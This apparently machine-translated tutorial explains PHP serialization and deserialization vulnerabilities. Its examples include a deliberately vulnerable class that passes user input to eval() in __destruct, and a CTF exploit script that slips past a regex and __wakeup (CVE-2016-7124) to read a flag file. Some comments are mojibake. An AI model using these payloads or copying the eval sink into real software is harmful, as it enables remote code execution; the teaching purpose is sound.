1 Preface

Recently I have been reviewing the content I have learned before, and I feel that I have an understanding of PHP deserialization It’s more in-depth, so I’ll summarize it here

2 serialize() function

“All values ??in php can use the function serialize() to return a word containing Represented by a throttling string. Serializing an object will save all the variables of the object, but will not save the object's methods, only the name of the class."

This concept may be a little confusing at first. , but then I gradually understood

When the program execution ends, the memory data will be destroyed immediately. The data stored in the variables is the memory data, and the files and databases are "persistent data", so the PHP sequence Storage is the process of "saving" variable data in memory to persistent data in a file.

Related learning recommendations: PHP programming from entry to proficiency

 $s = serialize($變量); //該函數(shù)將變量數(shù)據(jù)進(jìn)行序列化轉(zhuǎn)換為字符串
 file_put_contents(‘./目標(biāo)文本文件', $s); //將$s保存到指定文件

Let’s learn about serialization through a specific example:

<?php
class User
{
  public $age = 0;
  public $name = &#39;&#39;;

  public function PrintData()
  {
    echo &#39;User &#39;.$this->name.&#39;is&#39;.$this->age.&#39;years old. <br />&#39;;
  }
}
//創(chuàng)建一個(gè)對(duì)象
$user = new User();
// 設(shè)置數(shù)據(jù)
$user->age = 20;
$user->name = &#39;daye&#39;;

//輸出數(shù)據(jù)
$user->PrintData();
//輸出序列化之后的數(shù)據(jù)
echo serialize($user);

?>

This is the result:

You can see that after serializing an object, all the variables of the object will be saved, and it is found that the serialized result has a character , these characters are abbreviations of the following letters.

a - array         b - boolean
d - double         i - integer
o - common object     r - reference
s - string         C - custom object
O - class         N - null
R - pointer reference   U - unicode string

After understanding the type letters of the abbreviation, you can get the PHP serialization format

O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"daye";}
對(duì)象類(lèi)型:長(zhǎng)度:"類(lèi)名":類(lèi)中變量的個(gè)數(shù):{類(lèi)型:長(zhǎng)度:"值";類(lèi)型:長(zhǎng)度:"值";......}

Through the above example, you can understand the concept of returning a byte stream through the serialize() function The string of this paragraph.

3 unserialize() function

unserialize() operate on a single serialized variable and convert it back PHP value. Before deserializing an object, the object's class must be defined before deserializing.

To put it simply, it is the process of restoring the serialized data stored in the file to the variable representation of the program code, and restoring the results before the variable serialization.

 $s = file_get_contents(‘./目標(biāo)文本文件'); //取得文本文件的內(nèi)容（之前序列化過(guò)的字符串）
 $變量 = unserialize($s); //將該文本內(nèi)容，反序列化到指定的變量中

Learn about deserialization through an example:

<?php
class User
{
  public $age = 0;
  public $name = &#39;&#39;;

  public function PrintData()
  {
    echo &#39;User &#39;.$this->name.&#39; is &#39;.$this->age.&#39; years old. <br />&#39;;
  }
}
//重建對(duì)象
$user = unserialize(&#39;O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"daye";}&#39;);

$user->PrintData();

?>

This is the result:

##Note: Before deserializing an object, the object's class must be defined before deserializing. Otherwise, an error will be reported

4 PHP deserialization vulnerability

Before learning the vulnerability, let’s first understand the PHP magic function, which will help with the next study It will be helpful

PHP reserves all class methods starting with __ (two underscores) as magic methods

__construct  當(dāng)一個(gè)對(duì)象創(chuàng)建時(shí)被調(diào)用，
__destruct  當(dāng)一個(gè)對(duì)象銷(xiāo)毀時(shí)被調(diào)用，
__toString  當(dāng)一個(gè)對(duì)象被當(dāng)作一個(gè)字符串被調(diào)用。
__wakeup()  使用unserialize時(shí)觸發(fā)
__sleep()  使用serialize時(shí)觸發(fā)
__destruct()  對(duì)象被銷(xiāo)毀時(shí)觸發(fā)
__call()  在對(duì)象上下文中調(diào)用不可訪問(wèn)的方法時(shí)觸發(fā)
__callStatic()  在靜態(tài)上下文中調(diào)用不可訪問(wèn)的方法時(shí)觸發(fā)
__get()  用于從不可訪問(wèn)的屬性讀取數(shù)據(jù)
__set()  用于將數(shù)據(jù)寫(xiě)入不可訪問(wèn)的屬性
__isset()  在不可訪問(wèn)的屬性上調(diào)用isset()或empty()觸發(fā)
__unset()   在不可訪問(wèn)的屬性上使用unset()時(shí)觸發(fā)
__toString()  把類(lèi)當(dāng)作字符串使用時(shí)觸發(fā),返回值需要為字符串
__invoke()  當(dāng)腳本嘗試將對(duì)象調(diào)用為函數(shù)時(shí)觸發(fā)

Only a part of the magic functions are listed here,

Let’s use an example to understand the process of automatic calling of the magic function

<?php
class test{
 public $varr1="abc";
 public $varr2="123";
 public function echoP(){
 echo $this->varr1."<br>";
 }
 public function __construct(){
 echo "__construct<br>";
 }
 public function __destruct(){
 echo "__destruct<br>";
 }
 public function __toString(){
 return "__toString<br>";
 }
 public function __sleep(){
 echo "__sleep<br>";
 return array(&#39;varr1&#39;,&#39;varr2&#39;);
 }
 public function __wakeup(){
 echo "__wakeup<br>";
 }
}

$obj = new test(); //實(shí)例化對(duì)象，調(diào)用__construct()方法，輸出__construct
$obj->echoP();  //調(diào)用echoP()方法，輸出"abc"
echo $obj;  //obj對(duì)象被當(dāng)做字符串輸出，調(diào)用__toString()方法，輸出__toString
$s =serialize($obj); //obj對(duì)象被序列化，調(diào)用__sleep()方法，輸出__sleep
echo unserialize($s); //$s首先會(huì)被反序列化，會(huì)調(diào)用__wake()方法，被反序列化出來(lái)的對(duì)象又被當(dāng)做字符串，就會(huì)調(diào)用_toString()方法。
// 腳本結(jié)束又會(huì)調(diào)用__destruct()方法，輸出__destruct
?>

This is the result:

You can see it clearly through this example The magic function will be called when the corresponding conditions are met.

5 Object injection

A vulnerability will occur when the user's request is not properly filtered before being passed to the deserialization function unserialize(). Because PHP allows object serialization, an attacker could submit a specific serialized string to a vulnerable unserialize function, ultimately leading to the injection of an arbitrary PHP object within the scope of the application.

Object vulnerabilities must meet two prerequisites:

1. The parameters of unserialize are controllable.

2. A class containing a magic method is defined in the code, and there are some functions with security issues that use class member variables as parameters in the method.

Let’s give an example:

<?php
class A{
  var $test = "demo";
  function __destruct(){
      echo $this->test;
  }
}
$a = $_GET[&#39;test&#39;];
$a_unser = unserialize($a);
?>

For example, in this example, the user-generated content is directly passed to the unserialize() function, then you can construct such a statement

?test=O:1:"A":1:{s:4:"test";s:5:"lemon";}

and run it in the script After the end, the _destruct function will be called, and the test variable will be overwritten to output lemon.

#If you find this vulnerability, you can use this vulnerability to control the input variables and splice them into a serialized object.

Look at another example:

<?php
class A{
  var $test = "demo";
  function __destruct(){
    @eval($this->test);//_destruct()函數(shù)中調(diào)用eval執(zhí)行序列化對(duì)象中的語(yǔ)句
  }
}
$test = $_POST[&#39;test&#39;];
$len = strlen($test)+1;
$pp = "O:1:\"A\":1:{s:4:\"test\";s:".$len.":\"".$test.";\";}"; // 構(gòu)造序列化對(duì)象
$test_unser = unserialize($pp); // 反序列化同時(shí)觸發(fā)_destruct函數(shù)
?>

In fact, if you look closely, you will find that we actually construct the serialized object manually so that the unserialize() function can trigger the __destruc() function, and then execute it in_ Malicious statements in the _destruc() function.

So we can use this vulnerability to obtain the web shell

6 Bypass the deserialization of the magic function

wakeup() magic function bypass

PHP5<5.6.25
PHP7<7.0.10

PHP deserialization vulnerability CVE-2016-7124

#a#重點(diǎn)：當(dāng)反序列化字符串中，表示屬性個(gè)數(shù)的值大于真實(shí)屬性個(gè)數(shù)時(shí)，會(huì)繞過(guò) __wakeup 函數(shù)的執(zhí)行

百度杯——Hash

其實(shí)仔細(xì)分析代碼，只要我們能繞過(guò)兩點(diǎn)即可得到f15g_1s_here.php的內(nèi)容

（1）繞過(guò)正則表達(dá)式對(duì)變量的檢查
（2）繞過(guò)_wakeup()魔法函數(shù)，因?yàn)槿绻覀兎葱蛄谢牟皇?code>Gu3ss_m3_h2h2.php,這個(gè)魔法函數(shù)在反序列化時(shí)會(huì)觸發(fā)并強(qiáng)制轉(zhuǎn)成Gu3ss_m3_h2h2.php

那么問(wèn)題就來(lái)了，如果繞過(guò)正則表達(dá)式
（1）/[oc]:\d+:/i，例如：o:4:這樣就會(huì)被匹配到,而繞過(guò)也很簡(jiǎn)單，只需加上一個(gè)+,這個(gè)正則表達(dá)式即匹配不到0:+4:

（2）繞過(guò)_wakeup()魔法函數(shù)，上面提到了當(dāng)反序列化字符串中，表示屬性個(gè)數(shù)的值大于真實(shí)屬性個(gè)數(shù)時(shí)，會(huì)繞過(guò) _wakeup 函數(shù)的執(zhí)行

編寫(xiě)php序列化腳本

<?php
class Demo {
  private $file = &#39;Gu3ss_m3_h2h2.php&#39;;

  public function __construct($file) {
    $this->file = $file;
  }

  function __destruct() {
    echo @highlight_file($this->file, true);
  }

  function __wakeup() {
    if ($this->file != &#39;Gu3ss_m3_h2h2.php&#39;) {
      //the secret is in the f15g_1s_here.php
      $this->file = &#39;Gu3ss_m3_h2h2.php&#39;;
    }
  }
}
#先創(chuàng)建一個(gè)對(duì)象，自動(dòng)調(diào)用__construct魔法函數(shù)
$obj = new Demo(&#39;f15g_1s_here.php&#39;);
#進(jìn)行序列化
$a = serialize($obj);
#使用str_replace() 函數(shù)進(jìn)行替換，來(lái)繞過(guò)正則表達(dá)式的檢查
$a = str_replace(&#39;O:4:&#39;,&#39;O:+4:&#39;,$a);
#使用str_replace() 函數(shù)進(jìn)行替換，來(lái)繞過(guò)__wakeup()魔法函數(shù)
$a = str_replace(&#39;:1:&#39;,&#39;:2:&#39;,$a);
#再進(jìn)行base64編碼
echo base64_encode($a);
?>

The above is the detailed content of Detailed explanation of php deserialization. For more information, please follow other related articles on the PHP Chinese website!